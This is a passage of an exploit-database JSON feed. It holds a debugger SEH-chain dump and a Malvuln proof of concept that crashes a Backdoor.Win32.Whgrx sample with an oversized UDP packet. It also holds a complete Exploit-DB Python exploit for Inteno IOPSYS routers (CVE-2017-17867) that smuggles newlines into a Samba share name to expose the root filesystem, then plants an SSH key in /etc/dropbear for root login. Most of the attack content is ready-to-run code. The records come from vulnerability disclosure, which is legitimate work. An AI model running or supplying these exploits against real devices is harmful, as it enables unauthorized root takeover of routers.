ntdll!ExecuteHandler2+44 (773e9d70) \n043660a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04366654: ntdll!ExecuteHandler2+44 (773e9d70) \n04366c04: ntdll!ExecuteHandler2+44 (773e9d70) \n043671b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04367764: ntdll!ExecuteHandler2+44 (773e9d70) \n04367d14: ntdll!ExecuteHandler2+44 (773e9d70) \n043682c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04368874: ntdll!ExecuteHandler2+44 (773e9d70) \n04368e24: ntdll!ExecuteHandler2+44 (773e9d70) \n043693d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04369984: ntdll!ExecuteHandler2+44 (773e9d70) \n04369f34: ntdll!ExecuteHandler2+44 (773e9d70) \n0436a4e4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436aa94: ntdll!ExecuteHandler2+44 (773e9d70) \n0436b044: ntdll!ExecuteHandler2+44 (773e9d70) \n0436b5f4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436bba4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436c154: ntdll!ExecuteHandler2+44 (773e9d70) \n0436c704: ntdll!ExecuteHandler2+44 (773e9d70) \n0436ccb4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436d264: ntdll!ExecuteHandler2+44 (773e9d70) \n0436d814: ntdll!ExecuteHandler2+44 (773e9d70) \n0436ddc4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436e374: ntdll!ExecuteHandler2+44 (773e9d70) \n0436e924: ntdll!ExecuteHandler2+44 (773e9d70) \n0436eed4: ntdll!ExecuteHandler2+44 (773e9d70) \n0436f484: ntdll!ExecuteHandler2+44 (773e9d70) \n0436fa34: ntdll!ExecuteHandler2+44 (773e9d70) \n0436ffe4: ntdll!ExecuteHandler2+44 (773e9d70) \n04370594: ntdll!ExecuteHandler2+44 (773e9d70) \n04370b44: ntdll!ExecuteHandler2+44 (773e9d70) \n043710f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043716a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04371c54: ntdll!ExecuteHandler2+44 (773e9d70) \n04372204: ntdll!ExecuteHandler2+44 (773e9d70) \n043727b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04372d64: ntdll!ExecuteHandler2+44 (773e9d70) \n04373314: ntdll!ExecuteHandler2+44 (773e9d70) \n043738c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04373e74: ntdll!ExecuteHandler2+44 (773e9d70) \n04374424: ntdll!ExecuteHandler2+44 (773e9d70) \n043749d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04374f84: ntdll!ExecuteHandler2+44 (773e9d70) \n04375534: ntdll!ExecuteHandler2+44 (773e9d70) \n04375ae4: ntdll!ExecuteHandler2+44 (773e9d70) \n04376094: ntdll!ExecuteHandler2+44 (773e9d70) \n04376644: ntdll!ExecuteHandler2+44 (773e9d70) \n04376bf4: ntdll!ExecuteHandler2+44 (773e9d70) \n043771a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04377754: ntdll!ExecuteHandler2+44 (773e9d70) \n04377d04: ntdll!ExecuteHandler2+44 (773e9d70) \n043782b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04378864: ntdll!ExecuteHandler2+44 (773e9d70) \n04378e14: ntdll!ExecuteHandler2+44 (773e9d70) \n043793c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04379974: ntdll!ExecuteHandler2+44 (773e9d70) \n04379f24: ntdll!ExecuteHandler2+44 (773e9d70) \n0437a4d4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437aa84: ntdll!ExecuteHandler2+44 (773e9d70) \n0437b034: ntdll!ExecuteHandler2+44 (773e9d70) \n0437b5e4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437bb94: ntdll!ExecuteHandler2+44 (773e9d70) \n0437c144: ntdll!ExecuteHandler2+44 (773e9d70) \n0437c6f4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437cca4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437d254: ntdll!ExecuteHandler2+44 (773e9d70) \n0437d804: ntdll!ExecuteHandler2+44 (773e9d70) \n0437ddb4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437e364: ntdll!ExecuteHandler2+44 (773e9d70) \n0437e914: ntdll!ExecuteHandler2+44 (773e9d70) \n0437eec4: ntdll!ExecuteHandler2+44 (773e9d70) \n0437f474: ntdll!ExecuteHandler2+44 (773e9d70) \n0437fa24: ntdll!ExecuteHandler2+44 (773e9d70) \n0437ffd4: ntdll!ExecuteHandler2+44 (773e9d70) \n04380584: ntdll!ExecuteHandler2+44 (773e9d70) \n04380b34: ntdll!ExecuteHandler2+44 (773e9d70) \n043810e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04381694: ntdll!ExecuteHandler2+44 (773e9d70) \n04381c44: ntdll!ExecuteHandler2+44 (773e9d70) \n043821f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043827a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04382d54: ntdll!ExecuteHandler2+44 (773e9d70) \n04383304: ntdll!ExecuteHandler2+44 (773e9d70) \n043838b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04383e64: ntdll!ExecuteHandler2+44 (773e9d70) \n04384414: ntdll!ExecuteHandler2+44 (773e9d70) \n043849c4: ntdll!ExecuteHandler2+44 (773e9d70) \n04384f74: ntdll!ExecuteHandler2+44 (773e9d70) \n04385524: ntdll!ExecuteHandler2+44 (773e9d70) \n04385ad4: ntdll!ExecuteHandler2+44 (773e9d70) \n04386084: ntdll!ExecuteHandler2+44 (773e9d70) \n04386634: ntdll!ExecuteHandler2+44 (773e9d70) \n04386be4: ntdll!ExecuteHandler2+44 (773e9d70) \n04387194: ntdll!ExecuteHandler2+44 (773e9d70) \n04387744: ntdll!ExecuteHandler2+44 (773e9d70) \n04387cf4: ntdll!ExecuteHandler2+44 (773e9d70) \n043882a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04388854: ntdll!ExecuteHandler2+44 (773e9d70) \n04388e04: ntdll!ExecuteHandler2+44 (773e9d70) \n043893b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04389964: ntdll!ExecuteHandler2+44 (773e9d70) \n04389f14: ntdll!ExecuteHandler2+44 (773e9d70) \n0438a4c4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438aa74: ntdll!ExecuteHandler2+44 (773e9d70) \n0438b024: ntdll!ExecuteHandler2+44 (773e9d70) \n0438b5d4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438bb84: ntdll!ExecuteHandler2+44 (773e9d70) \n0438c134: ntdll!ExecuteHandler2+44 (773e9d70) \n0438c6e4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438cc94: ntdll!ExecuteHandler2+44 (773e9d70) \n0438d244: ntdll!ExecuteHandler2+44 (773e9d70) \n0438d7f4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438dda4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438e354: ntdll!ExecuteHandler2+44 (773e9d70) \n0438e904: ntdll!ExecuteHandler2+44 (773e9d70) \n0438eeb4: ntdll!ExecuteHandler2+44 (773e9d70) \n0438f464: ntdll!ExecuteHandler2+44 (773e9d70) \n0438fa14: ntdll!ExecuteHandler2+44 (773e9d70) \n0438ffc4: ntdll!ExecuteHandler2+44 (773e9d70) \n04390574: ntdll!ExecuteHandler2+44 (773e9d70) \n04390b24: ntdll!ExecuteHandler2+44 (773e9d70) \n043910d4: ntdll!ExecuteHandler2+44 (773e9d70) \n04391684: ntdll!ExecuteHandler2+44 (773e9d70) \n04391c34: ntdll!ExecuteHandler2+44 (773e9d70) \n043921e4: ntdll!ExecuteHandler2+44 (773e9d70) \n04392794: ntdll!ExecuteHandler2+44 (773e9d70) \n04392d44: ntdll!ExecuteHandler2+44 (773e9d70) \n043932f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043938a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04393e54: ntdll!ExecuteHandler2+44 (773e9d70) \n04394404: ntdll!ExecuteHandler2+44 (773e9d70) \n043949b4: ntdll!ExecuteHandler2+44 (773e9d70) \n04394f64: ntdll!ExecuteHandler2+44 (773e9d70) \n04395514: ntdll!ExecuteHandler2+44 (773e9d70) \n04395ac4: ntdll!ExecuteHandler2+44 (773e9d70) \n04396074: ntdll!ExecuteHandler2+44 (773e9d70) \n04396624: ntdll!ExecuteHandler2+44 (773e9d70) \n04396bd4: ntdll!ExecuteHandler2+44 (773e9d70) \n04397184: ntdll!ExecuteHandler2+44 (773e9d70) \n04397734: ntdll!ExecuteHandler2+44 (773e9d70) \n04397ce4: ntdll!ExecuteHandler2+44 (773e9d70) \n04398294: ntdll!ExecuteHandler2+44 (773e9d70) \n04398844: ntdll!ExecuteHandler2+44 (773e9d70) \n04398df4: ntdll!ExecuteHandler2+44 (773e9d70) \n043993a4: ntdll!ExecuteHandler2+44 (773e9d70) \n04399954: ntdll!ExecuteHandler2+44 (773e9d70) \n04399f04: ntdll!ExecuteHandler2+44 (773e9d70) \n0439a4b4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439aa64: ntdll!ExecuteHandler2+44 (773e9d70) \n0439b014: ntdll!ExecuteHandler2+44 (773e9d70) \n0439b5c4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439bb74: ntdll!ExecuteHandler2+44 (773e9d70) \n0439c124: ntdll!ExecuteHandler2+44 (773e9d70) \n0439c6d4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439cc84: ntdll!ExecuteHandler2+44 (773e9d70) \n0439d234: ntdll!ExecuteHandler2+44 (773e9d70) \n0439d7e4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439dd94: ntdll!ExecuteHandler2+44 (773e9d70) \n0439e344: ntdll!ExecuteHandler2+44 (773e9d70) \n0439e8f4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439eea4: ntdll!ExecuteHandler2+44 (773e9d70) \n0439f454: ntdll!ExecuteHandler2+44 (773e9d70) \n0439fa04: ntdll!ExecuteHandler2+44 (773e9d70) \n0439ffb4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a0564: ntdll!ExecuteHandler2+44 (773e9d70) \n043a0b14: ntdll!ExecuteHandler2+44 (773e9d70) \n043a10c4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a1674: ntdll!ExecuteHandler2+44 (773e9d70) \n043a1c24: ntdll!ExecuteHandler2+44 (773e9d70) \n043a21d4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a2784: ntdll!ExecuteHandler2+44 (773e9d70) \n043a2d34: ntdll!ExecuteHandler2+44 (773e9d70) \n043a32e4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a3894: ntdll!ExecuteHandler2+44 (773e9d70) \n043a3e44: ntdll!ExecuteHandler2+44 (773e9d70) \n043a43f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a49a4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a4f54: ntdll!ExecuteHandler2+44 (773e9d70) \n043a5504: ntdll!ExecuteHandler2+44 (773e9d70) \n043a5ab4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a6064: ntdll!ExecuteHandler2+44 (773e9d70) \n043a6614: ntdll!ExecuteHandler2+44 (773e9d70) \n043a6bc4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a7174: ntdll!ExecuteHandler2+44 (773e9d70) \n043a7724: ntdll!ExecuteHandler2+44 (773e9d70) \n043a7cd4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a8284: ntdll!ExecuteHandler2+44 (773e9d70) \n043a8834: ntdll!ExecuteHandler2+44 (773e9d70) \n043a8de4: ntdll!ExecuteHandler2+44 (773e9d70) \n043a9394: ntdll!ExecuteHandler2+44 (773e9d70) \n043a9944: ntdll!ExecuteHandler2+44 (773e9d70) \n043a9ef4: ntdll!ExecuteHandler2+44 (773e9d70) \n043aa4a4: ntdll!ExecuteHandler2+44 (773e9d70) \n043aaa54: ntdll!ExecuteHandler2+44 (773e9d70) \n043ab004: ntdll!ExecuteHandler2+44 (773e9d70) \n043ab5b4: ntdll!ExecuteHandler2+44 (773e9d70) \n043abb64: ntdll!ExecuteHandler2+44 (773e9d70) \n043ac114: ntdll!ExecuteHandler2+44 (773e9d70) \n043ac6c4: ntdll!ExecuteHandler2+44 (773e9d70) \n043acc74: ntdll!ExecuteHandler2+44 (773e9d70) \n043ad224: ntdll!ExecuteHandler2+44 (773e9d70) \n043ad7d4: ntdll!ExecuteHandler2+44 (773e9d70) \n043add84: ntdll!ExecuteHandler2+44 (773e9d70) \n043ae334: ntdll!ExecuteHandler2+44 (773e9d70) \n043ae8e4: ntdll!ExecuteHandler2+44 (773e9d70) \n043aee94: ntdll!ExecuteHandler2+44 (773e9d70) \n043af444: ntdll!ExecuteHandler2+44 (773e9d70) \n043af9f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043affa4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b0554: ntdll!ExecuteHandler2+44 (773e9d70) \n043b0b04: ntdll!ExecuteHandler2+44 (773e9d70) \n043b10b4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b1664: ntdll!ExecuteHandler2+44 (773e9d70) \n043b1c14: ntdll!ExecuteHandler2+44 (773e9d70) \n043b21c4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b2774: ntdll!ExecuteHandler2+44 (773e9d70) \n043b2d24: ntdll!ExecuteHandler2+44 (773e9d70) \n043b32d4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b3884: ntdll!ExecuteHandler2+44 (773e9d70) \n043b3e34: ntdll!ExecuteHandler2+44 (773e9d70) \n043b43e4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b4994: ntdll!ExecuteHandler2+44 (773e9d70) \n043b4f44: ntdll!ExecuteHandler2+44 (773e9d70) \n043b54f4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b5aa4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b6054: ntdll!ExecuteHandler2+44 (773e9d70) \n043b6604: ntdll!ExecuteHandler2+44 (773e9d70) \n043b6bb4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b7164: ntdll!ExecuteHandler2+44 (773e9d70) \n043b7714: ntdll!ExecuteHandler2+44 (773e9d70) \n043b7cc4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b8274: ntdll!ExecuteHandler2+44 (773e9d70) \n043b8824: ntdll!ExecuteHandler2+44 (773e9d70) \n043b8dd4: ntdll!ExecuteHandler2+44 (773e9d70) \n043b9384: ntdll!ExecuteHandler2+44 (773e9d70) \n043b9934: ntdll!ExecuteHandler2+44 (773e9d70) \n043b9ee4: ntdll!ExecuteHandler2+44 (773e9d70) \n043ba494: ntdll!ExecuteHandler2+44 (773e9d70) \n043baa44: ntdll!ExecuteHandler2+44 (773e9d70) \n043baff4: ntdll!ExecuteHandler2+44 (773e9d70) \n043bb5a4: ntdll!ExecuteHandler2+44 (773e9d70) \n043bbb54: ntdll!ExecuteHandler2+44 (773e9d70) \n043bc104: ntdll!ExecuteHandler2+44 (773e9d70) \n043bc6b4: ntdll!ExecuteHandler2+44 (773e9d70) \n043bcc64: ntdll!ExecuteHandler2+44 (773e9d70) \n043bd214: ntdll!ExecuteHandler2+44 (773e9d70) \n043bd7c4: ntdll!ExecuteHandler2+44 (773e9d70) \n043bdd68: Backdoor_Win32_Whgrx_eb6fd418cd3b52132ffb029b52839edf+74a40 (00474a40) \n043bfeac: 42424242 \nInvalid exception stack at 42424242 \n \n \nExploit/PoC: \nfrom socket import * \n \nMALWARE_HOST=\"x.x.x.x\" \nPORT=65000 \n \ndef doit(): \n#UDP Protocol \ns=socket(AF_INET, SOCK_DGRAM) \ns.connect((MALWARE_HOST, PORT)) \n \nPACKO=\"PUT /\"+\"A\"*6000+ \"HTTP/1.1\\r\\nHost: \"+\"B\"*2126 \n \ns.send(PACKO) \ns.close() \nprint(\"Backdoor.Win32.Whgrx / Remote Host Header Stack Buffer Overflow\"); \nprint(\"MD5: eb6fd418cd3b52132ffb029b52839edf\"); \nprint(\"By Malvuln\"); \n \nif __name__==\"__main__\": \ndoit() \n \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160983/MVID-2021-0030.txt"}], "exploitdb": [{"lastseen": "2021-01-18T08:31:18", "description": "", "published": "2021-01-18T00:00:00", "type": "exploitdb", "title": "Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-17867"], "modified": "2021-01-18T00:00:00", "id": "EDB-ID:49438", "href": "https://www.exploit-db.com/exploits/49438", "sourceData": "# Exploit Title: Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)\r\n# Date: 2020-03-29\r\n# Exploit Author: Henrik Pedersen\r\n# Vendor Homepage: https://intenogroup.com/\r\n# Version: Iopsys <3.16.5\r\n# Fixed Version: Iopsys 3.16.5\r\n# Tested on: Kali Linux 2020.4 against an Inteno DG200 Router\r\n\r\n# Description:\r\n# It was possible to add newlines to nearly any of the samba share options when creating a new Samba share in Inteno\u2019s Iopsys routers before 3.16.5. This made it possible to change the configurations in smb.conf, giving root access to the filesystem.\r\n\r\n# Patch in release\r\n# notes: https://dev.iopsys.eu/iopsys/iopsyswrt/blob/9d2366785d5a7d896359436149c2dbd3caec1a8e/releasenotes/release-notes-IOP-OS-version-3.16.x.txt\r\n\r\n# Exploit writeup: https://xistens.gitlab.io/xistens/exploits/iopsys-root-filesystem-access/\r\n\r\n#!/usr/bin/python3\r\nimport json\r\nimport sys\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom websocket import create_connection\r\nfrom impacket.smbconnection import SMBConnection\r\nfrom impacket.examples.smbclient import MiniImpacketShell\r\n\r\n\"\"\"\r\nRoot filesystem access via sambashare name configuration option in Inteno's Iopsys < 3.16.5\r\n\r\nUsage: smbexploit.py -u <username> -p <password> -k <path/to/id_rsa.pub> <host>\r\n\r\nRequires:\r\nimpacket\r\nwebsocket-client\r\n\r\nOn Windows:\r\npyreadline\r\n\r\n\"\"\"\r\n\r\ndef ubusAuth(host, username, password):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\r\n \"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [\r\n \"00000000000000000000000000000000\",\"session\",\"login\",\r\n {\"username\": username,\"password\": password}\r\n ],\r\n \"id\": 666\r\n })\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n key = response.get('result')[1].get('ubus_rpc_session')\r\n except IndexError:\r\n return None\r\n return key\r\n\r\ndef ubusCall(host, key, namespace, argument, params={}):\r\n \"\"\"\r\n https://github.com/neonsea/inteno-exploits/blob/master/cve-2017-17867.py\r\n \"\"\"\r\n ws = create_connection(f\"ws://{host}\", header = [\"Sec-WebSocket-Protocol: ubus-json\"])\r\n req = json.dumps({\"jsonrpc\": \"2.0\", \"method\": \"call\",\r\n \"params\": [key,namespace,argument,params],\r\n \"id\": 666})\r\n ws.send(req)\r\n response = json.loads(ws.recv())\r\n ws.close()\r\n try:\r\n result = response.get('result')[1]\r\n except IndexError:\r\n if response.get('result')[0] == 0:\r\n return True\r\n return None\r\n return result\r\n\r\ndef auth(host, user, password):\r\n print(\"Authenticating...\")\r\n key = ubusAuth(host, user, password)\r\n if not key:\r\n print(\"[-] Auth failed!\")\r\n sys.exit(1)\r\n print(f\"[+] Auth successful\")\r\n return key\r\n\r\ndef smb_put(args):\r\n username = \"\"\r\n password = \"\"\r\n\r\n try:\r\n smbClient = SMBConnection(args.host, args.host, sess_port=445)\r\n smbClient.login(username, password, args.host)\r\n\r\n print(\"Reading SSH key\")\r\n try:\r\n with open(args.key_path, \"r\") as fd:\r\n sshkey = fd.read()\r\n except IOError:\r\n print(f\"[-] Error reading {args.sshkey}\")\r\n \r\n print(\"Creating temp file for authorized_keys\")\r\n try:\r\n with open(\"authorized_keys\", \"w\") as fd:\r\n fd.write(sshkey)\r\n path = os.path.realpath(fd.name)\r\n except IOError:\r\n print(\"[-] Error creating authorized_keys\")\r\n\r\n shell = MiniImpacketShell(smbClient)\r\n shell.onecmd(\"use pwned\")\r\n shell.onecmd(\"cd /etc/dropbear\")\r\n shell.onecmd(f\"put {fd.name}\") \r\n\r\n print(\"Cleaning up...\")\r\n os.remove(path)\r\n except Exception as e:\r\n print(\"[-] Error connecting to SMB share:\")\r\n print(str(e))\r\n sys.exit(1)\r\n\r\ndef main(args):\r\n payload = \"pwned]\\npath=/\\nguest ok=yes\\nbrowseable=yes\\ncreate mask=0755\\nwriteable=yes\\nforce user=root\\n[abc\"\r\n key = auth(args.host, args.user, args.passwd)\r\n print(\"Adding Samba share...\")\r\n smbcheck = json.dumps(ubusCall(args.host, key, \"uci\", \"get\", {\"config\":\"samba\"}))\r\n if \"pwned\" in smbcheck:\r\n print(\"[*] Samba share seems to already exist, skipping\")\r\n else:\r\n smba = ubusCall(args.host, key, \"uci\", \"add\", {\r\n \"config\": \"samba\", \r\n \"type\":\"sambashare\", \r\n \"values\": {\r\n \"name\": payload, \r\n \"read_only\": \"no\", \r\n \"create_mask\":\"0775\", \r\n \"dir_mask\":\"0775\",\r\n \"path\": \"/mnt/\", \r\n \"guest_ok\": \"yes\"\r\n }\r\n })\r\n if not smba:\r\n print(\"[-] Adding Samba share failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Enabling Samba...\")\r\n smbe = ubusCall(args.host, key, \"uci\", \"set\",\r\n {\"config\":\"samba\", \"type\":\"samba\", \"values\":\r\n {\"interface\":\"lan\"}})\r\n if not smbe:\r\n print(\"[-] Enabling Samba failed!\")\r\n sys.exit(1)\r\n\r\n print(\"Committing changes...\")\r\n smbc = ubusCall(args.host, key, \"uci\", \"commit\",\r\n {\"config\":\"samba\"})\r\n if not smbc:\r\n print(\"[-] Committing changes failed!\")\r\n sys.exit(1)\r\n \r\n if args.key_path:\r\n # Allow the service to start\r\n time.sleep(2)\r\n smb_put(args)\r\n print(f\"[+] Exploit complete. Try \\\"ssh -i id_rsa root@{args.host}\\\"\")\r\n else:\r\n print(\"[+] Exploit complete, SMB share added.\")\r\n\r\ndef parse_args(args):\r\n \"\"\" Create the arguments \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-u\", dest=\"user\", help=\"Username\", default=\"user\")\r\n parser.add_argument(\"-p\", dest=\"passwd\", help=\"Password\", default=\"user\")\r\n parser.add_argument(\"-k\", dest=\"key_path\", help=\"Public ssh key path\")\r\n parser.add_argument(dest=\"host\", help=\"Target host\")\r\n\r\n if len(sys.argv) < 2:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n return parser.parse_args(args)\r\n\r\nif __name__ == \"__main__\":\r\n main(parse_args(sys.argv[1:]))", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49438"}]}
